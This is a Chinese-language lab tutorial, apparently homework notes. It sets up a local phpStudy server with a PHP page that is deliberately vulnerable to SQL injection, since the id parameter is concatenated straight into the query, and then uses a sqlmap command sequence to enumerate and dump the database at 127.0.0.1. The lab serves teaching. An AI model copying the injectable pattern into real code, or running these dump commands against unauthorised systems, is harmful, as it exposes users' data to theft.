随便搭

0x01 什么是phpstudy

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

0x02 配置环境

打开phpstudy ,把Apache和MySQL服务打开即可,配置完毕。

0x03 WWW

找到安装phpstudy的目录,找到www目录,在这里我写了一个php文件如下,不多解释,代码有注释而且很简单!

<?php
$db['host'] = '127.0.0.1';
$db['port'] = '3306';
$db['username'] = 'root';
$db['password'] = 'root';
$db['database'] = '2015kdctf_sqlsql';

function mysql_connect($host, $user, $passwd,$database) //定义数据库连接函数
{
return mysqli_connect($host, $user, $passwd,$database);
}

function mysql_fetch_assoc($result) //把查询结果转换成数组
{
return mysqli_fetch_assoc($result);
}

function mysql_query($sql, $cxn) //执行sql查询的语句
{
$a = mysqli_query($cxn, $sql);
return $a;
}

$link = mysql_connect($db['host'] . ':' . $db['port'], $db['username'], $db['password'],$db["database"]); //连接数据库

function getData($sql){
global $link; //全局变量
$r = mysql_query($sql,$link); //
$result = array();
if ($r) { //查询
while ($row = mysql_fetch_assoc($r)) {
$result = $row;
}
return $result;
}
return false;
}

$sql="select * from type where id=".$_GET['id'];
$a=getData($sql);
var_dump($a);
echo "Welcome";
?>

这里放一下搭好的网站页面!

0x04 Connect to database

找到这个路径E:\phpstudy_pro\Extensions\MySQL5.7.26\bin,打开CMD,输入命令和密码,连接成功。

mysql.exe -h localhost -u root -p

查看一下自己传的数据库并使用这个数据库

show databases;
use 2015kdctf_sqlsql;

查看数据库列表

show tables;
image-20201026114331566
image-20201026114331566

使用数据库查表语句

select * from type;

也可以具体查看

select * from type where id=1;

到这里数据库里的东西就被我们知道的一清二楚了,最后我们可以去验证一下在sqlmap下是否可以进行注入呢!

0x05 sqlmap注入

又特么回到了sqlmap注入,劳资不想注了,但是还是得给它写完!🤮

来吧,跟上次的有所不同,这次我是在Windows环境下注入,下一个sqlmap安装到自己的python2.7路径下,我的路径是C:\python27-x64\sqlmap\sqlmapproject-sqlmap-5029d67。这里不知道为什么多了一个文件夹,可能当时没有解压好吧。

在这个路径下,打开CMD,还是那些熟悉的命令!首先指定要注入的URL;

sqlmap.py -u "http://127.0.0.1/66.php?id=1"

然后呢然后呢!注吐了要

sqlmap.py -u "http://127.0.0.1/66.php?id=1" --dbs

再然后呢再然后呢

sqlmap.py -u "http://127.0.0.1/66.php?id=1" --current-db

继续

sqlmap.py -u "http://127.0.0.1/66.php?id=1" -D 2015kdctf_sqlsql --tables

gogogogo on

sqlmap.py -u "http://127.0.0.1/66.php?id=1" -D 2015kdctf_sqlsql -T type --columns

final final

sqlmap.py -u "http://127.0.0.1/66.php?id=1" -D 2015kdctf_sqlsql -T type -C id,name --dump

搞完了搞完了!

0x06 总结

扯了三周,终于把sql注入搞完了,天啊,我太菜了我爬!当然还有很多注入方式和命令在这里就不一一演示了

这里有一个sqli的github链接https://github.com/Audi-1/sqli-labs,可以在本地上搭建试试,很容易上手的(我已经替大家试过了)。

OK,就这样结束吧,希望这篇文章能对大家网络安全的作业有帮助吧……